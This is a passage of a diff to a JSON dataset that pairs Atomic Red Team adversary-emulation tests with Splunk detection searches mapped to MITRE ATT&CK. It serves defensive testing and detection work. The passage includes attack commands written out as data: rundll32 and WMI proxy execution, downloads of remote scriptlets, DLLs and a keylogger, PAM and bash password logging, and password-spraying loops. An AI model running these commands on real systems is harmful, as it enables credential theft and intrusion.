$Class.Derive(\"Win32_Atomic\")\n$NewClass.Put()\nInvoke-WmiMethod -Path Win32_Atomic -Name create -ArgumentList notepad.exe\n", - "wmic /node:127.0.0.1 process call create \"rundll32.exe \\..\\ExternalPayloads\\calc.dll StartW\"\n", + "wmic /node:127.0.0.1 process call create \"rundll32.exe \"\\..\\ExternalPayloads\\calc.dll\" StartW\"\n", "wmic /node:\"127.0.0.1\" product where \"name like 'Tightvnc%%'\" call uninstall", "powershell/lateral_movement/invoke_wmi", "powershell/persistence/elevated/wmi", @@ -92866,12 +93025,12 @@ "dependencies": [ { "description": "DLL with function to execute must exist on disk at specified location (#{dll_to_execute})", - "prereq_command": "if (Test-Path #{dll_to_execute}) {exit 0} else {exit 1}", + "prereq_command": "if (Test-Path \"#{dll_to_execute}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true\" -OutFile \"#{dll_to_execute}\"\n" } ], "executor": { - "command": "wmic /node:#{node} process call create \"rundll32.exe #{dll_to_execute} #{function_to_execute}\"\n", + "command": "wmic /node:#{node} process call create \"rundll32.exe \"#{dll_to_execute}\" #{function_to_execute}\"\n", "cleanup_command": "taskkill /f /im calculator.exe", "name": "powershell" } @@ -97070,7 +97229,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "process $process_name$ creating image file $file_path$ in $dest$", + "message": "Process $process_name$ creating image file $file_path$ in $dest$", "mitre_attack_id": [ "T1113" ], @@ -97079,7 +97238,7 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -97147,7 +97306,7 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -97360,7 +97519,358 @@ "commands": [], "queries": [], "parsed_datasets": [], - "possible_detections": [], + "possible_detections": [ + { + "name": "PowerShell WebRequest Using Memory Stream", + "description": "This analytic identifies a common fileless malware staging technique of using .NET classes to directly download a URL payload into memory. The analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution.", + "search": "`powershell` EventCode=4104 ScriptBlockText IN (\"*system.net.webclient*\",\"*system.net.webrequest*\") AND ScriptBlockText=\"*IO.MemoryStream*\" | eval Path = case(isnotnull(Path),Path,true(),\"unknown\") | stats count min(_time) as firstTime max(_time) as lastTime list(ScriptBlockText) as command values(Path) as file_name values(UserID) as user by ActivityID, Computer, EventCode | rename Computer as dest, EventCode as signature_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_webrequest_using_memory_stream_filter`", + "tags": { + "name": "PowerShell WebRequest Using Memory Stream", + "analytic_story": [ + "Malicious PowerShell" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Command And Control", + "Exploitation" + ], + "message": "Powershell webrequest to memory stream behavior. Possible fileless malware staging on $dest$ by $user$.", + "mitre_attack_id": [ + "T1059.001", + "T1105", + "T1027.011" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "file_name", + "type": "File Name", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 80, + "security_domain": "endpoint", + "risk_severity": "high", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1105", + "mitre_attack_technique": "Ingress Tool Transfer", + "mitre_attack_tactics": [ + "Command And Control" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "Ajax Security Team", + "Andariel", + "Aquatic Panda", + "BITTER", + "BRONZE BUTLER", + "BackdoorDiplomacy", + "Chimera", + "Cobalt Group", + "Confucius", + "Darkhotel", + "Dragonfly", + "Elderwood", + "Ember Bear", + "Evilnum", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "IndigoZebra", + "Indrik Spider", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "LuminousMoth", + "Magic Hound", + "Metador", + "Molerats", + "Moses Staff", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "PLATINUM", + "Patchwork", + "Rancor", + "Rocke", + "Sandworm Team", + "SideCopy", + "Sidewinder", + "Silence", + "TA505", + "TA551", + "TeamTNT", + "Threat Group-3390", + "Tonto Team", + "Tropic Trooper", + "Turla", + "Volatile Cedar", + "WIRTE", + "Whitefly", + "Windshift", + "Winnti Group", + "ZIRCONIUM", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1027.011", + "mitre_attack_technique": "Fileless Storage", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT32", + "Turla" + ] + } + ] + } + }, + { + "name": "Windows Registry Payload Injection", + "description": "The following analytic identifies when suspiciouly long data is written to the registry. This behavior is often associated with certain fileless malware threats or persistence techniques used by threat actors. Data stored in the registy is considered fileless since it does not get written to disk and is traditionally not well defended since normal users can modify thier own registry.", + "search": "| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid| `drop_dm_object_name(Processes)` | join max=0 dest process_guid [| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry where Registry.registry_value_data=* by _time span=1h Registry.dest Registry.registry_path Registry.registry_value_name Registry.process_guid Registry.registry_value_data Registry.registry_key_name | `drop_dm_object_name(Registry)` | eval reg_data_len = len(registry_value_data) | where reg_data_len > 512] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data)| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `windows_registry_payload_injection_filter`", + "tags": { + "name": "Windows Registry Payload Injection", + "analytic_story": [ + "Unusual Processes" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Exploitation" + ], + "message": "The process $process_name$ added a suspicious length of registry data on $dest$.", + "mitre_attack_id": [ + "T1027", + "T1027.011" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] + }, + { + "name": "process", + "type": "Process", + "role": [ + "Attacker" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Attacker" + ] + } + ], + "risk_score": 60, + "security_domain": "endpoint", + "risk_severity": "medium", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1027", + "mitre_attack_technique": "Obfuscated Files or Information", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT18", + "APT19", + "APT28", + "APT3", + "APT32", + "APT33", + "APT37", + "APT39", + "APT41", + "BITTER", + "BackdoorDiplomacy", + "BlackOasis", + "Blue Mockingbird", + "Dark Caracal", + "Darkhotel", + "Earth Lusca", + "Elderwood", + "Ember Bear", + "Fox Kitten", + "GALLIUM", + "Gallmaker", + "Gamaredon Group", + "Group5", + "Higaisa", + "Inception", + "Ke3chang", + "Kimsuky", + "Lazarus Group", + "Leviathan", + "Magic Hound", + "Metador", + "Mofang", + "Molerats", + "Moses Staff", + "Mustang Panda", + "OilRig", + "Putter Panda", + "Rocke", + "Sandworm Team", + "Sidewinder", + "TA505", + "TeamTNT", + "Threat Group-3390", + "Transparent Tribe", + "Tropic Trooper", + "Whitefly", + "Windshift", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1027.011", + "mitre_attack_technique": "Fileless Storage", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT32", + "Turla" + ] + } + ] + } + } + ], "external_reference": [], "controls": [], "x_mitre_network_requirements": false, @@ -101391,15 +101901,15 @@ "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct\").Exec();window.close();\n", "rundll32 vbscript:\"\\..\\mshtml,RunHTMLApplication \"+String(CreateObject(\"WScript.Shell\").Run(\"calc.exe\"),0)\n", "rundll32 vbscript:\"\\..\\mshtml,#135 \"+String(CreateObject(\"WScript.Shell\").Run(\"calc.exe\"),0)\n", - "rundll32.exe advpack.dll,LaunchINFSection \\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", - "rundll32.exe ieadvpack.dll,LaunchINFSection \\T1218.011\\src\\T1218.011.inf,DefaultInstall_SingleUser,1,\n", - "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 \\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", - "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 \\T1218.011\\src\\T1218.011_DefaultInstall.inf\n", - "rundll32.exe url.dll,OpenURL PathToAtomicsFolder\\T1218.011\\src\\index.hta\nrundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\n", + "rundll32.exe advpack.dll,LaunchINFSection \"\\T1218.011\\src\\T1218.011.inf\",DefaultInstall_SingleUser,1,\n", + "rundll32.exe ieadvpack.dll,LaunchINFSection \"\\T1218.011\\src\\T1218.011.inf\",DefaultInstall_SingleUser,1,\n", + "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 \"\\T1218.011\\src\\T1218.011_DefaultInstall.inf\"\n", + "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 \"\\T1218.011\\src\\T1218.011_DefaultInstall.inf\"\n", + "rundll32.exe url.dll,OpenURL \"PathToAtomicsFolder\\T1218.011\\src\\index.hta\"\nrundll32.exe URL.dll,FileProtocolHandler \"PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\"\n", "rundll32.exe pcwutl.dll,LaunchApplication %windir%\\System32\\notepad.exe\n", "rundll32.exe C:\\Users\\$env:username\\Downloads\\calc.png, StartW\n", - "rundll32.exe \\T1218.010\\bin\\AllTheThingsx64.dll,#2\n", - "rundll32.exe shell32.dll,Control_RunDLL \\T1047\\bin\\calc.dll\n", + "rundll32.exe \"\\T1218.010\\bin\\AllTheThingsx64.dll\",#2\n", + "rundll32.exe shell32.dll,Control_RunDLL \"\\T1047\\bin\\calc.dll\"\n", "copy %windir%\\System32\\calc.exe not_an_scr.scr\nrundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr\n" ], "commands": [], @@ -101487,13 +101997,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", - "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"#{inf_to_execute}\"\n" + "description": "Inf file must exist on disk at specified location (\"#{inf_to_execute}\")\n", + "prereq_command": "if (Test-Path \"#{inf_to_execute}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{inf_to_execute}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"#{inf_to_execute}\"\n" } ], "executor": { - "command": "rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,\n", + "command": "rundll32.exe advpack.dll,LaunchINFSection \"#{inf_to_execute}\",DefaultInstall_SingleUser,1,\n", "name": "command_prompt" } }, @@ -101514,13 +102024,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", - "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"#{inf_to_execute}\"\n" + "description": "Inf file must exist on disk at specified location (\"#{inf_to_execute}\")\n", + "prereq_command": "if (Test-Path \"#{inf_to_execute}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{inf_to_execute}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf\" -OutFile \"#{inf_to_execute}\"\n" } ], "executor": { - "command": "rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1,\n", + "command": "rundll32.exe ieadvpack.dll,LaunchINFSection \"#{inf_to_execute}\",DefaultInstall_SingleUser,1,\n", "name": "command_prompt" } }, @@ -101541,13 +102051,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", - "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + "description": "Inf file must exist on disk at specified location (\"#{inf_to_execute}\")\n", + "prereq_command": "if (Test-Path \"#{inf_to_execute}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{inf_to_execute}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"#{inf_to_execute}\"\n" } ], "executor": { - "command": "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 #{inf_to_execute}\n", + "command": "rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 \"#{inf_to_execute}\"\n", "name": "command_prompt" } }, @@ -101568,13 +102078,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "Inf file must exist on disk at specified location (#{inf_to_execute})\n", - "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + "description": "Inf file must exist on disk at specified location (\"#{inf_to_execute}\")\n", + "prereq_command": "if (Test-Path \"#{inf_to_execute}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{inf_to_execute}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf\" -OutFile \"#{inf_to_execute}\"\n" } ], "executor": { - "command": "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 #{inf_to_execute}\n", + "command": "rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 \"#{inf_to_execute}\"\n", "name": "command_prompt" } }, @@ -101586,7 +102096,7 @@ "windows" ], "executor": { - "command": "rundll32.exe url.dll,OpenURL PathToAtomicsFolder\\T1218.011\\src\\index.hta\nrundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\n", + "command": "rundll32.exe url.dll,OpenURL \"PathToAtomicsFolder\\T1218.011\\src\\index.hta\"\nrundll32.exe URL.dll,FileProtocolHandler \"PathToAtomicsFolder\\T1218.011\\src\\akteullen.vbs\"\n", "name": "command_prompt" } }, @@ -101664,13 +102174,13 @@ "dependencies": [ { "description": "DLL file must exist on disk at specified location\n", - "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{input_file}\") {exit 0} else {exit 1}\n", "get_prereq_command": "Invoke-WebRequest \"#{input_url}\" -OutFile \"#{input_file}\"\n" } ], "executor": { "name": "command_prompt", - "command": "rundll32.exe #{input_file},#2\n" + "command": "rundll32.exe \"#{input_file}\",#2\n" } }, { @@ -101696,13 +102206,13 @@ "dependencies": [ { "description": "DLL file must exist on disk at specified location\n", - "prereq_command": "if (Test-Path #{input_file}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{input_file}\") {exit 0} else {exit 1}\n", "get_prereq_command": "Invoke-WebRequest \"#{input_url}\" -OutFile \"#{input_file}\"\n" } ], "executor": { "name": "command_prompt", - "command": "rundll32.exe shell32.dll,Control_RunDLL #{input_file}\n" + "command": "rundll32.exe shell32.dll,Control_RunDLL \"#{input_file}\"\n" } }, { @@ -102105,7 +102615,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -102205,7 +102715,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -102305,7 +102815,7 @@ ] }, { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" @@ -102675,7 +103185,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "process $process_name$ with cmdline $process$ in host $dest$", + "message": "Process $process_name$ with cmdline $process$ in host $dest$", "mitre_attack_id": [ "T1218", "T1218.011" @@ -102692,7 +103202,7 @@ ] }, { - "name": "SourceImage", + "name": "process_name", "type": "Process Name", "role": [ "Attacker" @@ -103096,7 +103606,7 @@ { "name": "Suspicious Rundll32 dllregisterserver", "description": "The following analytic identifies rundll32.exe using dllregisterserver on the command line to load a DLL. When a DLL is registered, the DllRegisterServer method entry point in the DLL is invoked. This is typically seen when a DLL is being registered on the system. Not every instance is considered malicious, but it will capture malicious use of it. During investigation, review the parent process and parrellel processes executing. Capture the DLL being loaded and inspect further. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*dllregisterserver* by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_dllregisterserver_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*dllregisterserver* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `suspicious_rundll32_dllregisterserver_filter`", "tags": { "name": "Suspicious Rundll32 dllregisterserver", "analytic_story": [ @@ -103197,7 +103707,7 @@ { "name": "Suspicious Rundll32 no Command Line Arguments", "description": "The following analytic identifies rundll32.exe with no command line arguments. It is unusual for rundll32.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. Rundll32.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_rundll32` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(rundll32\\.exe.{0,4}$)\" | `suspicious_rundll32_no_command_line_arguments_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where `process_rundll32` by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process=\"(?i)(rundll32\\.exe.{0,4}$)\" | `suspicious_rundll32_no_command_line_arguments_filter`", "tags": { "name": "Suspicious Rundll32 no Command Line Arguments", "analytic_story": [ @@ -103231,7 +103741,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -103388,7 +103898,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "rundll32.exe running with suspicious parameters on $dest$", + "message": "rundll32.exe running with suspicious StartW parameters on $dest$", "mitre_attack_id": [ "T1218", "T1218.011" @@ -103405,7 +103915,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -105716,7 +106226,7 @@ { "name": "Recon AVProduct Through Pwh or WMI", "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104 performing checks to identify anti-virus products installed on the endpoint. This technique is commonly found in malware and APT events where the adversary will map all running security applications or services. During triage, review parallel processes within the same timeframe. Review the full script block to identify other related artifacts.", - "search": "`powershell` EventCode=4104 (ScriptBlockText = \"*SELECT*\" OR ScriptBlockText = \"*WMIC*\") AND (ScriptBlockText = \"*AntiVirusProduct*\" OR ScriptBlockText = \"*AntiSpywareProduct*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `recon_avproduct_through_pwh_or_wmi_filter`", + "search": "`powershell` EventCode=4104 (ScriptBlockText = \"*SELECT*\" OR ScriptBlockText = \"*WMIC*\") AND (ScriptBlockText = \"*AntiVirusProduct*\" OR ScriptBlockText = \"*AntiSpywareProduct*\") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `recon_avproduct_through_pwh_or_wmi_filter`", "tags": { "name": "Recon AVProduct Through Pwh or WMI", "analytic_story": [ @@ -105735,7 +106245,7 @@ "kill_chain_phases": [ "Reconnaissance" ], - "message": "A suspicious powershell script contains AV recon command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "message": "A suspicious powershell script contains AV recon command in $ScriptBlockText$ with EventCode $EventCode$ in host $dest$", "mitre_attack_id": [ "T1592" ], @@ -105744,14 +106254,14 @@ ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -106255,7 +106765,7 @@ } ], "command_list": [ - "\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath $env:TEMP\\key.log\n", + "&\"\\T1056.001\\src\\Get-Keystrokes.ps1\" -LogPath $env:TEMP\\key.log\n", "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;\nif sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;\nsudo touch /tmp/password-auth.bk\nsudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so\nenable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so\nenable=* log_password\" >> /etc/pam.d/system-auth\n", "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> /tmp/.keyboard.log' DEBUG\necho \"Hello World!\"\ncat /tmp/.keyboard.log\n", @@ -106290,12 +106800,12 @@ "dependencies": [ { "description": "Get-Keystrokes PowerShell script must exist on disk at PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1\n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1) {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1056.001/src/Get-Keystrokes.ps1 -OutFile PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1 \n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -ItemType Directory (Split-Path \"PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1\") -Force | Out-Null\nInvoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1056.001/src/Get-Keystrokes.ps1 -OutFile \"PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1\"\n" } ], "executor": { - "command": "$PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1 -LogPath #{filepath}\n", + "command": "&\"$PathToAtomicsFolder\\T1056.001\\src\\Get-Keystrokes.ps1\" -LogPath #{filepath}\n", "cleanup_command": "Remove-Item $env:TEMP\\key.log -ErrorAction Ignore\n", "name": "powershell", "elevation_required": true @@ -107635,9 +108145,9 @@ ], "command_list": [ "echo Password1> passwords.txt\necho 1q2w3e4r>> passwords.txt\necho Password!>> passwords.txt\necho Spring2022>> passwords.txt\necho ChangeMe!>> passwords.txt\n@FOR /F \"delims=\" %p in (passwords.txt) DO @net use %logonserver%\\IPC$ /user:\"%userdomain%\\%username%\" \"%p\" 1>NUL 2>&1 && @echo [*] %username%:%p && @net use /delete %logonserver%\\IPC$ > NUL\n", - "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$passwordList = Get-Content -Path \\T1110.001\\src\\passwords.txt\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"$ENV:USERNAME\", $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account $ENV:USERNAME.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] $ENV:USERNAME:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", + "if (\"NTLM\".ToLower() -NotIn @(\"ntlm\",\"kerberos\")) {\n Write-Host \"Only 'NTLM' and 'Kerberos' auth methods are supported\"\n exit 1\n}\n\n[System.Reflection.Assembly]::LoadWithPartialName(\"System.DirectoryServices.Protocols\") | Out-Null\n$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier(\"$env:UserDnsDomain\",389)\n\n$passwordList = Get-Content -Path \"\\T1110.001\\src\\passwords.txt\"\nforeach ($password in $passwordList){\n $credz = new-object System.Net.NetworkCredential(\"$ENV:USERNAME\", $password, \"$env:UserDnsDomain\")\n $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)\n try {\n Write-Host \" [-] Attempting ${password} on account $ENV:USERNAME.\"\n $conn.bind()\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] $ENV:USERNAME:${password} are valid credentials!\"\n } catch {\n Write-Host $_.Exception.Message\n }\n}\nWrite-Host \"End of bruteforce\"\n", "Import-Module -Name AzureAD\n\nPassword1`n1q2w3e4r`nPassword! = \"Password1`n1q2w3e4r`nPassword!\".split(\"{`n}\")\nforeach($password in Password1`n1q2w3e4r`nPassword!) {\n $PWord = 